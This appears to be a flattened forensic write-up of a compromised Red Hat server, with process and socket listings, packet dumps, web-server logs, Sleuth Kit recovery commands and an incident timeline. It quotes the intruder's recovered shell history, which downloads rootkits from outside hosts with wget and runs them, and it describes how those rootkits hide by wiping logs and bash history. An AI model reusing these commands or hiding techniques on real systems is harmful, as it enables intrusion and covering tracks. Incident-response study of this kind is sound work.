PreparationAnalysis of the fetched data
Recording
Analysis of the network connections and process informationAnswers to the Questions
Analysis of deleted files
Creation of the mactime List
Mounting of the Image
Analysis of unallocated Disk Space
Analysis with the MD5 list
Summary
COMMAND PID
USER FD TYPE DEVICE SIZE NODE NAME smbd 3137 0 6u IPv4 4571 TCP *:2003 (LISTEN) smbd 3137 0 16u IPv4 976 TCP *:443 (LISTEN) smbd 3137 0 17u IPv4 977 TCP *:80 (LISTEN) (swapd) 3153 0 16u IPv4 976 TCP *:443 (LISTEN) (swapd) 3153 0 17u IPv4 977 TCP *:80 (LISTEN) initd 15119 0 3u IPv4 15617 TCP *:65336 (LISTEN) initd 15119 0 5u IPv4 15619 TCP *:65436 (LISTEN) initd 15119 0 6u IPv4 16157 TCP 192.168.1.79:65336->213.154.118.200:1188 (ESTABLISHED) initd 15119 0 9u IPv4 15909 TCP 192.168.1.79:1146->199.184.165.133:6667 (ESTABLISHED) initd 15119 0 12u IPv4 16191 TCP 192.168.1.79:1149->64.62.96.42:6667 (ESTABLISHED) xopen 25239 0 8u IPv4 9972 UDP *:3049 xopen 25239 0 16u IPv4 976 TCP *:443 (LISTEN) xopen 25239 0 17u IPv4 977 TCP *:80 (LISTEN) xopen 25241 0 8u IPv4 12302 TCP *:3128 (LISTEN) xopen 25241 0 16u IPv4 976 TCP *:443 (LISTEN) xopen 25241 0 17u IPv4 977 TCP *:80 (LISTEN) lsn 25247 0 16u IPv4 976 TCP *:443 (LISTEN) lsn 25247 0 17u IPv4 977 TCP *:80 (LISTEN) |
040 S root
3137 1 0 69 0
- 475 do_sel 13:33 ?
0:03 smbd -D PWD=/tmp/sand HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu
SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb
PATH=/usr/local/bin:/bin:/usr/bin _=/usr/bin/smbd -D 100 S root 3153 1 0 69 0 - 416 wait_f 13:33 ? 0:00 (swapd) PWD=/usr/bin HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu OLDPWD=/tmp/sand SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/usr/bin/(swapd) 040 S root 3247 1 0 69 0 - 368 do_sel 13:33 ? 0:00 syslogd -m 0 PWD=/tmp/sand HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu LANG=en_US SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin _=/sbin/initlog 140 S root 3252 1 0 69 0 - 496 do_sys 13:33 ? 0:00 klogd -2 PWD=/tmp/sand HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu LANG=en_US SHLVL=5 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin _=/sbin/initlog 040 S root 25239 1 0 69 0 - 470 wait_f 15:32 ? 0:00 /lib/.x/s/xopen -q -p 3128 PWD=/lib/.x/s HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu SHLVL=4 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/lib/.x/s/xopen OLDPWD=/lib/.x 040 S root 25241 1 0 69 0 - 472 do_sel 15:32 ? 0:00 /lib/.x/s/xopen -q -p 3128 PWD=/lib/.x/s HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu SHLVL=4 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/lib/.x/s/xopen OLDPWD=/lib/.x 140 S root 25247 1 0 69 0 - 417 wait_f 15:32 ? 0:00 /lib/.x/s/lsn PWD=/lib/.x/s HOSTNAME=localhost.localdomain MACHTYPE=i386-redhat-linux-gnu SHLVL=4 SHELL=/bin/false HOSTTYPE=i386 OSTYPE=linux-gnu HOME=/ TERM=dumb PATH=/usr/local/bin:/bin:/usr/bin _=/lib/.x/s/lsn OLDPWD=/lib/.x 040 S root 15119 1 0 69 0 - 574 do_sel 16:02 ? 0:00 initd PWD=/etc/opt/psybnc HOSTNAME=sbm79.dtc.apu.edu LESSOPEN=|/usr/bin/lesspipe.sh %s USER=root MACHTYPE=i386-redhat-linux-gnu MAIL=/var/spool/mail/root INPUTRC=/etc/inputrc OLDPWD=/etc/opt BASH_ENV=/root/.bashrc LANG=en_US LOGNAME=root SHLVL=2 SHELL=/bin/bash USERNAME=root HOSTTYPE=i386 OSTYPE=linux-gnu HISTSIZE=1000 HOME=/root TERM=xterm PAT H=:PATH SSH_TTY=/dev/pts/0 _=./initd |
/usr/sbin/tcpdump -X -n -r sotm29.tcpdump
"host 213.154.118.200" 13:22:56.510346 192.168.1.79.65336 > 213.154.118.200.1188: P 4174526037:4174526159(122) ack 5552923 win 6936 (DF) 0x0000 4500 00a2 506c 4000 4006 db8f c0a8 014f E...Pl@.@......O 0x0010 d59a 76c8 ff38 04a4 f8d2 3655 0054 bb1b ..v..8....6U.T.. 0x0020 5018 1b18 f772 0000 3a2d 7073 7942 4e43 P....r..:-psyBNC 0x0030 2170 7379 424e 4340 6c61 6d33 727a 2e64 !psyBNC@lam3rz.d 0x0040 6520 5052 4956 4d53 4720 5b5b 5b6b 6762 e.PRIVMSG.[[[kgb 0x0050 5d5d 5d20 3a53 756e 2041 7567 2031 3020 ]]].:Sun.Aug.10. 0x0060 3230 3a33 353a 3031 203a 5573 6572 2073 20:35:01.:User.s 0x0070 6963 2028 5b5b 5b6b 6762 5d5d 5d29 2064 ic.([[[kgb]]]).d 0x0080 6973 636f 6e6e 6563 7469 6e67 2066 726f isconnecting.fro 0x0090 6d20 7374 6f6e 6564 2073 6572 7665 722e m.stoned.server. 0x00a0 0d0a .. [...] |
/usr/sbin/tcpdump -X -n -r sotm29.tcpdump
"host 64.62.96.42" 13:22:29.969365 192.168.1.79.1149 > 64.62.96.42.ircd: P 0:9(9) ack 1 win 34752 <nop,nop,timestamp 10802589 404409721> (DF) 0x0000 4500 003d 49e9 4000 4006 8e72 c0a8 014f E..=I.@.@..r...O 0x0010 403e 602a 047d 1a0b 01c8 c3cc cbd7 603c @>`*.}........`< 0x0020 8018 87c0 87ad 0000 0101 080a 00a4 d59d ................ 0x0030 181a cd79 5049 4e47 203a 700d 0a ...yPING.:p.. 13:22:35.137116 192.168.1.79.1149 > 64.62.96.42.ircd: FP 9:33(24) ack 1 win 34752 <nop,nop,timestamp 10803107 404409721> (DF) 0x0000 4500 004c 49ea 4000 4006 8e62 c0a8 014f E..LI.@.@..b...O 0x0010 403e 602a 047d 1a0b 01c8 c3d5 cbd7 603c @>`*.}........`< 0x0020 8019 87c0 ed12 0000 0101 080a 00a4 d7a3 ................ 0x0030 181a cd79 5155 4954 203a 6368 616e 6769 ...yQUIT.:changi 0x0040 6e67 2073 6572 7665 7273 0d0a ng.servers.. |
# ils -f linux-ext3 -r ../sda1.dd
| tail +4 | awk -F '|' '$11 > 0 {print $1}' | \ > while read inode > do > icat ../sda1.dd $inode > sda1_icat_$inode > done |
213.154.118.219 - - [10/Aug/2003:13:16:27
-0700] "GET / HTTP/1.1" 400 385 "-" "-" 213.154.118.219 - - [10/Aug/2003:13:16:37 -0700] "GET / HTTP/1.1" 400 385 "-" "-" 213.154.118.219 - - [10/Aug/2003:13:23:17 -0700] "GET /sumthin HTTP/1.0" 404 279 "-" "-" |
[10/Aug/2003 13:24:29 02937] [error]
SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219)
(OpenSSL library error follows) [10/Aug/2003 13:24:29 02937] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different |
[10/Aug/2003 13:40:28 03272] [error]
Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.800
(System error follows) [10/Aug/2003 13:40:28 03272] [error] System: No such file or directory (errno: 2) |
[Sun Aug 10 04:02:01 2003] [notice]
Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
DAV/1.0.2 configured -- resuming normal operations [...] [Sun Aug 10 13:16:27 2003] [error] [client 213.154.118.219] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Sun Aug 10 13:16:37 2003] [error] [client 213.154.118.219] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): / [Sun Aug 10 13:23:17 2003] [error] [client 213.154.118.219] File does not exist: /var/www/html/sumthin [Sun Aug 10 13:24:29 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows) [Sun Aug 10 13:24:29 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different [Sun Aug 10 13:32:38 2003] [error] mod_ssl: SSL handshake failed (server localhost.localdomain:443, client 213.154.118.219) (OpenSSL library error follows) [Sun Aug 10 13:32:38 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different The remainder of the file contains messages like: [Sun Aug 10 13:40:28 2003] [error] mod_ssl: Child could not open SSLMutex lockfile /etc/httpd/logs/ssl_mutex.800 (System error follows) [Sun Aug 10 13:40:28 2003] [error] System: No such file or directory (errno: 2) |
# mkdir data # fls -f linux-ext3 -m / -r sda1.dd > data/body # ils -f linux-ext3 -m sda1.dd >> data/body # cd data # mactime -b body -i day dayindex -z PDT > timeline |
# mactime -b body -z PDT
08/07/2003 > timeline.20030807 |
# cp sda1.dd sda1.fsdebug.dd # losetup /dev/loop1 /home/ich/sotm29/sda1.fsdebug.dd # debugfs -w /dev/loop1 debugfs 1.27 (8-Mar-2002) debugfs: feature -needs_recovery Filesystem features: has_journal filetype sparse_super debugfs: quit # mount -t ext2 -o ro,noexec,noatime,nodev /dev/loop1 /mnt/tmp |
dls -f linux-ext3 ../sda1.dd > sda1.dls
strings -t d sda1.dls > sda1.dls.strings |
wget geocities.com/mybabywhy/rk.tar.gz tar -zxvf rk.tar.gz cd sand ./install wget geocities.com/gavish19/abc.tgz wget geocities.com/gavish19/abc.tgz wget www.lugojteam.as.ro/rootkit.tar ls -a cd informatii wget www.lugojteam.as.ro/rootkit.tar cd /tmp ls -a wget www.lugojteam.as.ro/rootkit.tar wget irinel1979.go.ro/mass2.tgz |
The file inst
The timeline created by mactime tells us that from 15:30:48 to 15:30:54 PDT adore.o and cleaner.o were built and sp0 and its files were copied to /usr/lib.
- installs the kernel-based rootkit adore under /usr/lib.
- installs a new ssh daemon "sp0" with its configuration files under /usr/lib.
- links /root/.bash_history to /dev/null.
- deletes /var/log/messages (again) and links it to /dev/null. But because syslogd and klogd have not been restarted this time, they can still write with the open filedescriptor to /var/log/messages.
- patches /etc/rc.d/rc.sysinit to start a executable named "kflushd", which doesn't exist in the entire filesystem. We assume that the download of this file failed. We downloaded this file ourselves and saw that this file was supposed to start adore and the ssh daemon sp0. Since there is no trace of kflushd in our fetched data, we conclude that neither adore nor sp0 were started.
dcat -f linux-ext3 ../sda1.dd
38994 3675648 > yy tail -c +3585 yy > rootkit.tar tar xivf rootkit.tar --ignore-failed-read |
# cd /mnt/tmp # find . -type f -print | xargs --replace md5sum {} > /home/ich/sotm29/linusotm29.md5s # cd /home/ich/sotm29 # cat linusotm29.md5s | perl -pe 's#(^[^.]*)\.(.*$)#$1$2#;' | sort -k 2 >sotm29-md5s.sort |
# wget http://project.honeynet.org/scans/scan29/linux-suspended-md5s.gz # gzip -dc linux-suspended-md5s.gz | sort -k 2 > linux-suspended-md5s.sort # diff linux-suspended-md5s.sort sotm29-md5s.sort > suspended-sotm29.diff |
id uptime ./inst hostname hostname sbm79.dtc.apu.edu cd /dev/shm/sc ./install sbm79.dtc.apu.edu rm -rf /var/mail/root ps x cd /tmp ls -a wget izolam.net/sslstop.tar.gz ps x ps aux | grep apache kill -9 21510 21511 23289 23292 23302 |
13:24:29 |
Initial breakin using a buffer overflow hole during
the SSL2 handshake process of OpenSSL. The attack originated from 213.154.118.21.
|
13:33:32 - 13:33:57 |
Download and installation of rk.tar.gz; start of
"smbd -D" and "(swapd)". |
14:14:01 |
Probable download of rootkit.tar.gz ("sonkeriki rootkit"). |
15:30:48 - 15:30:54 |
adore.o and cleaner.o were built and sp0 and
its files were copied to /usr/lib. sp0 and adore have probably never been
started because of a missing startup file "kflushd". |
15:32:15 |
Download, installation and start of suckit, xopen
and lsn. The execution of suckit failed. |
15:49:47 - 15:52:23 |
Download and execution of /root/sslstop.tar.gz |
15:54:24 |
Failed restart of httpd. |
15:57:12 - 16:02:36 |
Download and installation of psyBNC. |
COMMAND PID
USER FD TYPE DEVICE SIZE NODE NAME smbd 3137 0 6u IPv4 4571 TCP *:2003 (LISTEN) initd 15119 0 3u IPv4 15617 TCP *:65336 (LISTEN) initd 15119 0 5u IPv4 15619 TCP *:65436 (LISTEN) initd 15119 0 6u IPv4 16157 TCP 192.168.1.79:65336->213.154.118.200:1188 (ESTABLISHED) initd 15119 0 9u IPv4 15909 TCP 192.168.1.79:1146->199.184.165.133:6667 (ESTABLISHED) initd 15119 0 12u IPv4 16191 TCP 192.168.1.79:1149->64.62.96.42:6667 (ESTABLISHED) xopen 25239 0 8u IPv4 9972 UDP *:3049 xopen 25241 0 8u IPv4 12302 TCP *:3128 (LISTEN) |
tcp
0 0 192.168.1.79:65336
213.154.118.200:1188 ESTABLISHED 15119/initd (1) tcp 0 9 192.168.1.79:1149 64.62.96.42:6667 ESTABLISHED 15119/initd (2) tcp 0 0 192.168.1.79:1146 199.184.165.133:6667 ESTABLISHED 15119/initd (3) |
Time PDT |
Executable |
Remarks |
13:33:32 |
/usr/bin/smbd -D |
Part of rk.tar.gz |
15:30:48 |
/usr/lib/sp0 |
Installed together with adore |
15:32:16 |
/lib/.x/s/xopen |
Installed together with SucKIT |